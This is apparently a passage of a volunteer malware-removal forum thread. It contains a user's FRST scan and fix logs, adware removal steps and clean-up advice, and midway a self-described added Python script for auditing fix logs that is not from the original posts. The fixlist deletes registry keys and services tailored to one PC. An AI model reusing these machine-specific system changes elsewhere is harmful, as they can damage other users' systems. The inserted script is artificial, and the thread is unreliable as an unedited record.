2014-09-13 08:02 - 2014-09-13 08:02 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-13 07:57 - 2006-11-02 09:21 - 00412128 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-09-12 21:08 - 2009-08-06 10:20 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-09-12 21:04 - 2009-08-07 11:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Games
2014-09-12 20:31 - 2012-05-31 09:19 - 00000000 ____D () C:\Users\Hogg\Desktop\Dad Stuff
2014-09-12 20:26 - 2009-08-07 09:25 - 00112704 _____ () C:\Users\Hogg\AppData\Local\GDIPFONTCACHEV1.DAT
2014-09-12 20:18 - 2013-01-18 22:30 - 00000000 ____D () C:\FlightTest5
2014-09-12 20:12 - 2013-06-17 12:09 - 00000483 _____ () C:\0
2014-09-12 20:08 - 2012-10-08 19:59 - 00000000 ____D () C:\Users\Hogg\Desktop\Court Stuff
2014-09-12 19:43 - 2009-10-05 20:32 - 00000000 ____D () C:\Users\Hogg\AppData\Local\PowerCinema
2014-09-12 19:40 - 2009-08-06 10:45 - 00000000 ____D () C:\Program Files (x86)\SMINST
2014-09-12 16:46 - 2006-11-02 09:07 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2014-09-12 12:03 - 2010-01-15 11:32 - 00000000 ____D () C:\Windows\Hewlett-Packard
2014-09-12 08:08 - 2012-12-14 10:04 - 00003682 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-12 08:08 - 2012-04-01 10:36 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-12 08:08 - 2012-02-05 12:03 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-09-11 19:45 - 2014-09-11 19:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-11 19:45 - 2012-07-31 08:59 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\Malwarebytes
2014-09-11 19:45 - 2012-07-31 08:58 - 00000943 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-11 19:45 - 2012-07-31 08:58 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-11 19:45 - 2012-07-31 08:58 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-09-11 07:37 - 2009-08-06 10:44 - 00000000 ____D () C:\ProgramData\Norton
2014-09-10 09:12 - 2014-09-10 09:12 - 00001696 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iPod
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-09-10 09:08 - 2014-09-10 09:07 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{13306464-7F21-4CB3-8898-656F1737CBDE}
2014-09-10 09:08 - 2009-08-07 09:19 - 00000000 ____D () C:\Users\Hogg
2014-09-10 09:07 - 2014-09-10 09:07 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{A3C935CF-1510-4F00-9E9C-EF2EEF690822}
2014-09-09 16:14 - 2012-05-24 19:58 - 00003558 _____ () C:\Windows\System32\Tasks\Norton Security Scan for Hogg
2014-09-08 20:24 - 2014-08-16 10:09 - 00000000 ____D () C:\Users\Hogg\AppData\Local\Adobe
2014-09-07 18:53 - 2014-09-07 18:53 - 00131091 _____ () C:\Users\Hogg\Documents\French Powerpoint.pptx
2014-09-01 09:03 - 2014-09-01 09:03 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{1FCB82CA-3656-4F6D-9E00-833069C741DC}
2014-09-01 09:02 - 2014-09-01 09:02 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{5A7A28E0-64E5-4538-BCD1-3606DF5D5886}
2014-08-31 10:00 - 2009-08-07 09:43 - 00000552 _____ () C:\Windows\Tasks\PCDRScheduledMaintenance.job
2014-08-29 13:01 - 2006-11-02 06:35 - 101694776 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-08-29 10:05 - 2014-08-29 10:04 - 00000000 ___HD () C:\ProgramData\{698E0848-6D29-4305-80DC-E8D609260CE2}
2014-08-29 01:48 - 2013-06-30 07:49 - 00000440 _____ () C:\Windows\Tasks\PC Helper 360.job
2014-08-25 06:53 - 2009-10-07 07:01 - 00270496 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-08-18 12:55 - 2010-03-28 20:39 - 00000000 ____D () C:\Users\Hogg\Desktop\Football Stuff

Some content of TEMP:
====================
C:\Users\Hogg\AppData\Local\temp\Quarantine.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-09-15 12:50

==================== End Of Log ============================



#8 aharonov

  • Malware Response Team

Posted 15 September 2014 - 06:37 PM

How is your computer running now?


Please download the attached fixlist.txt and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


#9 mleehogg

  • Topic Starter

Posted 15 September 2014 - 07:16 PM

I'm not sure where to save the fixlist? Do I save it in the "logs" folder of the FRST file?



#10 aharonov

  • Malware Response Team

Posted 15 September 2014 - 08:33 PM

You have to download FRST again, but don't open it directly from the browser; save it to your Desktop instead. Then you can save the fixlist to the Desktop as well and run FRST from there.

#11 mleehogg

  • Topic Starter

Posted 16 September 2014 - 09:37 AM

Thank you. Computer seems to be doing much better.

Here is the fix log.

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 12-09-2014
Ran by Hogg at 2014-09-15 20:22:04 Run:1
Running from C:\Users\Hogg\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
C:\ProgramData\Windows Genuine Advantage
C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Users\nkkmebodcglnimjjbopgchmhpbmfdnpk
C:\Users\Hogg\AppData\Local\06f3f051-63b1-4d25-bc86-788f5e8250f9.crx
C:\Users\Hogg\AppData\Local\71A87F04-31A1-11E2-8271-B8AC6F996F26.crx
C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx
C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Users\afkgilhfgajhpdmckpbmdgkapgdjndbb
SearchScopes: HKLM - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {FB144184-B500-42F4-9A1B-8A558CB28A3F} URL = http://dts.search-results.com/sr?src=ieb&gct=ds&appid=394&systemid=406&apn_dtid=BND406&apn_ptnrs=AG6&o=APN10645&apn_uid=2492936740354564&q={searchTerms}
SearchScopes: HKCU - {4591E5ED-D4E2-45E9-9618-6C9ABFE25973} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3309350&CUI=UN22661023661384124&UM=2
Winsock: Catalog5 01 C:\Windows\SysWOW64\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5-x64 01 %SystemRoot%\System32\mswsock.dll [304128] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
CHR HKCU\...\Chrome\Extension: [iigplimlmgilpobjilfbfeilnpiigpgl] - C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx [2013-08-15]
CHR HKLM-x32\...\Chrome\Extension: [iigplimlmgilpobjilfbfeilnpiigpgl] - C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx [2013-08-15]
S2 vToolbarUpdater18.1.9; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [X]
Folder: C:\ProgramData\WindowsSearch
EmptyTemp:
*****************

C:\ProgramData\Windows Genuine Advantage => Moved successfully.
C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Users\nkkmebodcglnimjjbopgchmhpbmfdnpk => Moved successfully.
C:\Users\Hogg\AppData\Local\06f3f051-63b1-4d25-bc86-788f5e8250f9.crx => Moved successfully.
C:\Users\Hogg\AppData\Local\71A87F04-31A1-11E2-8271-B8AC6F996F26.crx => Moved successfully.
C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx => Moved successfully.
C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Users\afkgilhfgajhpdmckpbmdgkapgdjndbb => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B237E68D-B139-4E1C-9631-FE577DBCC43D}" => Key deleted successfully.
"HKCR\CLSID\{B237E68D-B139-4E1C-9631-FE577DBCC43D}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{B237E68D-B139-4E1C-9631-FE577DBCC43D}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{B237E68D-B139-4E1C-9631-FE577DBCC43D}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{FB144184-B500-42F4-9A1B-8A558CB28A3F}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{FB144184-B500-42F4-9A1B-8A558CB28A3F}" => Key not found.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{4591E5ED-D4E2-45E9-9618-6C9ABFE25973}" => Key deleted successfully.
"HKCR\CLSID\{4591E5ED-D4E2-45E9-9618-6C9ABFE25973}" => Key not found.
Winsock: Catalog5 entry 000000000001\\LibraryPath  was set successfully to %SystemRoot%\system32\NLAapi.dll
Winsock: Catalog5-x64 entry 000000000001\\LibraryPath  was set successfully to %SystemRoot%\system32\NLAapi.dll
"HKCU\SOFTWARE\Google\Chrome\Extensions\iigplimlmgilpobjilfbfeilnpiigpgl" => Key deleted successfully.
"C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx" => File/Directory not found.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\iigplimlmgilpobjilfbfeilnpiigpgl" => Key deleted successfully.
"C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx" => File/Directory not found.
vToolbarUpdater18.1.9 => Service deleted successfully.

========================= Folder: C:\ProgramData\WindowsSearch ========================

2014-09-14 09:08 - 2014-09-14 09:08 - 0000000 ____D () C:\ProgramData\WindowsSearch\MiniDumps
2014-09-14 09:08 - 2014-09-14 09:09 - 0008411 _____ () C:\ProgramData\WindowsSearch\MiniDumps\Microsoft Windows Search Filter Host_0.kdmp

====== End of Folder: ======

EmptyTemp: => Removed 1.1 GB temporary data.

The system needed a reboot.

==== End of Fixlog ====
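
An added example (not part of the original posts and not FRST's own code): a small Python audit of a Fixlog in the layout shown above. It separates items that were acted on from "not found" results and marks "not found" entries that an earlier line in the same run had already handled, as happens with the .crx file here. The function name and bucket names are assumptions of this example.

```python
import re

# Constructed sample: a subset of lines taken from the fix log above.
SAMPLE = r'''
C:\ProgramData\Windows Genuine Advantage => Moved successfully.
C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B237E68D-B139-4E1C-9631-FE577DBCC43D}" => Key deleted successfully.
"HKCR\CLSID\{B237E68D-B139-4E1C-9631-FE577DBCC43D}" => Key not found.
Winsock: Catalog5 entry 000000000001\\LibraryPath  was set successfully to %SystemRoot%\system32\NLAapi.dll
"C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx" => File/Directory not found.
vToolbarUpdater18.1.9 => Service deleted successfully.
EmptyTemp: => Removed 1.1 GB temporary data.

The system needed a reboot.
'''

# '<target> => <outcome>.' with optional quotes around the target
RESULT = re.compile(r'^"?(?P<target>.+?)"?\s+=>\s+(?P<outcome>.+?)\.?$')
# '<target> was set successfully to <value>' (the Winsock lines)
SET_OK = re.compile(r'^(?P<target>.+?)\s+was set successfully to (?P<value>.+)$')


def audit_fixlog(text):
    """Group fix results into done / already_handled / absent / review."""
    report = {"done": [], "already_handled": [], "absent": [],
              "review": [], "reboot": False}
    handled = set()  # targets an earlier line in this run already acted on
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "The system needed a reboot.":
            report["reboot"] = True
            continue
        m = RESULT.match(line)
        if m:
            target, outcome = m["target"], m["outcome"]
        else:
            m = SET_OK.match(line)
            if not m:
                continue  # headers, separators, folder listings
            target, outcome = m["target"], "set successfully"
        key = target.lower()
        if "successfully" in outcome or outcome.startswith("Removed"):
            report["done"].append(target)
            handled.add(key)
        elif "not found" in outcome:
            bucket = "already_handled" if key in handled else "absent"
            report[bucket].append(target)
        else:
            report["review"].append((target, outcome))  # anything unexpected
    return report
```

Anything that lands in `review` is an outcome the script does not recognise and should be read by hand before the machine is declared clean.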



#12 aharonov


Posted 16 September 2014 - 10:05 AM

That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.





Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restore points:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Rename Combofix.exe to Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden. So don't add a double extension Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run.
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this, malware exploits security holes in installed software (e.g. the browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Java™ 6 Update 38




Tips

I recommend reading and following the "16 simple and easy ways to keep your computer safe and secure on the Internet" (Link) by Lawrence Abrams.

#13 aharonov


Posted 29 September 2014 - 09:10 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.



